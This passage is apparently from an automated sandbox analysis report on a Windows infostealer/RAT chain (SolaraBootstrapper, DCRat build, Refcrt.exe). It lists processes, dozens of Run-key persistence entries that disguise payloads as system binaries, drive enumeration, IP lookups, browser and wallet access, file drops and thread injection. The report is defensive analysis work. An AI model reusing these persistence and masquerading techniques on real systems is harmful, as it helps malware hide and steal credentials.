dwm.exe.exe 820 services.exe.exe 2384 csrss.exe 2060 csrss.exe -
Loads dropped DLL 40 IoCs
Processes:
SolaraBootstrapper.exeYoutube.exeResult.exeDCRatBuild.exeSolaraBootstrapper.exeFrage build.exesolara.execmd.exeMsiExec.exeMsiExec.exeWerFault.execmd.execmd.execmd.execonhost.exepid process 2756 SolaraBootstrapper.exe 2756 SolaraBootstrapper.exe 2692 Youtube.exe 2692 Youtube.exe 2692 Youtube.exe 2756 SolaraBootstrapper.exe 2692 Youtube.exe 2692 Youtube.exe 2544 Result.exe 2544 Result.exe 2544 Result.exe 2692 Youtube.exe 2692 Youtube.exe 2544 Result.exe 2588 DCRatBuild.exe 2588 DCRatBuild.exe 2272 SolaraBootstrapper.exe 2272 SolaraBootstrapper.exe 2692 Youtube.exe 2972 Frage build.exe 2972 Frage build.exe 2544 Result.exe 1512 solara.exe 1512 solara.exe 684 cmd.exe 684 cmd.exe 2620 MsiExec.exe 2620 MsiExec.exe 1864 MsiExec.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2452 cmd.exe 2452 cmd.exe 1632 cmd.exe 1632 cmd.exe 2392 cmd.exe 2520 conhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 64 IoCs
Processes:
Refcrt.exeRefcrt.exeRefcrt.exesddsfsdf.exeRoblox.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\winNet\\wscript.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Downloaded Program Files\\explorer.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\winNet\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\DriversavessessionDlldhcp\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\DriversavessessionDlldhcp\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\winNet\\lsm.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" sddsfsdf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Offline Web Pages\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Offline Web Pages\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" Roblox.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\de-DE\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\MSOCache\\All Users\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\DriversavessessionDlldhcp\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\audiodg.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\winNet\\lsm.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\winNet\\wscript.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\winNet\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Windows\\Offline Web Pages\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\winNet\\spoolsv.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\DriversavessessionDlldhcp\\dwm.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sddsfsdf = "\"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\sddsfsdf = "\"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\winNet\\Idle.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Prefetch\\ReadyBoot\\explorer.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\MSOCache\\All Users\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\Default User\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Admin\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\DriversavessessionDlldhcp\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\DriversavessessionDlldhcp\\dwm.exe\"" Refcrt.exe -
Blocklisted process makes network request 4 IoCs
Processes:
msiexec.exeflow pid process 11 2956 msiexec.exe 12 2956 msiexec.exe 14 2956 msiexec.exe 16 2956 msiexec.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 ip-api.com 34 ipinfo.io 36 ipinfo.io -
Drops file in System32 directory 8 IoCs
Processes:
powershell.exeComContainerbrowserRefRuntime.execsc.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\SysWOW64\sv-SE\cmd.exe ComContainerbrowserRefRuntime.exe File created C:\Windows\SysWOW64\sv-SE\ebf1f9fa8afd6d ComContainerbrowserRefRuntime.exe File created \??\c:\Windows\System32\CSC9B65422D45F44341A51A8E825BEAE4A.TMP csc.exe File created \??\c:\Windows\System32\m6dw6b.exe csc.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 2520 set thread context of 2388 2520 conhost.exe explorer.exe -
Drops file in Program Files directory 29 IoCs
Processes:
Refcrt.exewscript.exe.exeRefcrt.execsc.exeRefcrt.exeComContainerbrowserRefRuntime.execsc.exedescription ioc process File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe Refcrt.exe File created C:\Program Files\Common Files\Services\6203df4a6bafc7 wscript.exe.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe Refcrt.exe File created \??\c:\Program Files\Windows Journal\fr-FR\CSCD76AE30457034164B573F4B2A5893960.TMP csc.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe Refcrt.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\088424020bedd6 Refcrt.exe File created C:\Program Files\Windows Defender\es-ES\ebf1f9fa8afd6d Refcrt.exe File created C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\audiodg.exe ComContainerbrowserRefRuntime.exe File created C:\Program Files (x86)\Common Files\Adobe\Updater6\smss.exe ComContainerbrowserRefRuntime.exe File created C:\Program Files (x86)\Common Files\Adobe\Updater6\69ddcba757bf72 ComContainerbrowserRefRuntime.exe File created \??\c:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe csc.exe File opened for modification C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe Refcrt.exe File created C:\Program Files\Microsoft Office\Office14\1033\5940a34987c991 Refcrt.exe File created C:\Program Files\Windows Journal\fr-FR\conhost.exe Refcrt.exe File created C:\Program Files\Windows Portable Devices\dwm.exe ComContainerbrowserRefRuntime.exe File created C:\Program Files (x86)\Common Files\DESIGNER\b75386f1303e64 Refcrt.exe File created \??\c:\Program Files\Windows Journal\fr-FR\conhost.exe csc.exe File created \??\c:\Program Files (x86)\Reference Assemblies\Microsoft\CSCB6ABC6A5FBFC4B328AE5916D92DC1AED.TMP csc.exe File created C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe Refcrt.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\088424020bedd6 Refcrt.exe File created C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe Refcrt.exe File created C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\42af1c969fbb7b ComContainerbrowserRefRuntime.exe File opened for modification C:\Program Files\Windows Portable Devices\dwm.exe ComContainerbrowserRefRuntime.exe File created C:\Program Files\Windows Portable Devices\6cb0b6c459d5d3 ComContainerbrowserRefRuntime.exe File created C:\Program Files\Common Files\Services\lsass.exe wscript.exe.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe Refcrt.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\c5b4cb5e9653cc Refcrt.exe File created C:\Program Files\Windows Journal\fr-FR\088424020bedd6 Refcrt.exe File created C:\Program Files\Windows Defender\es-ES\cmd.exe Refcrt.exe -
Drops file in Windows directory 23 IoCs
Processes:
Refcrt.exemsiexec.execsc.exeRefcrt.exeRefcrt.exesddsfsdf.execsc.exedescription ioc process File created C:\Windows\Offline Web Pages\Refcrt.exe Refcrt.exe File opened for modification C:\Windows\Installer\MSI58FF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI59BC.tmp msiexec.exe File created \??\c:\Windows\Downloaded Program Files\explorer.exe csc.exe File created C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe Refcrt.exe File created C:\Windows\Prefetch\ReadyBoot\7a0fd90576e088 Refcrt.exe File created C:\Windows\Offline Web Pages\a0b1fd4c5438e9 Refcrt.exe File created C:\Windows\de-DE\WmiPrvSE.exe Refcrt.exe File created C:\Windows\Installer\f7753ea.msi msiexec.exe File opened for modification C:\Windows\Installer\f7753ea.msi msiexec.exe File created C:\Windows\Downloaded Program Files\explorer.exe Refcrt.exe File created C:\Windows\Offline Web Pages\886983d96e3d3e Refcrt.exe File created C:\Windows\xdwd.dll sddsfsdf.exe File created C:\Windows\BitLockerDiscoveryVolumeContents\133006b48fb54b Refcrt.exe File created C:\Windows\de-DE\24dbde2999530e Refcrt.exe File opened for modification C:\Windows\Installer\MSI59AC.tmp msiexec.exe File created C:\Windows\Downloaded Program Files\7a0fd90576e088 Refcrt.exe File created C:\Windows\Offline Web Pages\csrss.exe Refcrt.exe File created \??\c:\Windows\Offline Web Pages\CSCC2D5E9D23B0A48B6BC6FE4B9ECA6CC38.TMP csc.exe File created \??\c:\Windows\Offline Web Pages\Refcrt.exe csc.exe File created \??\c:\Windows\Downloaded Program Files\CSCE0C07C03540D456BB3309258DBDFE59B.TMP csc.exe File created C:\Windows\diagnostics\system\DeviceCenter\es-ES\Refcrt.exe Refcrt.exe File created C:\Windows\Prefetch\ReadyBoot\explorer.exe Refcrt.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2204 2272 WerFault.exe SolaraBootstrapper.exe -
Processes:
SolaraBootstrapper.exeaudiodg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 SolaraBootstrapper.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e SolaraBootstrapper.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af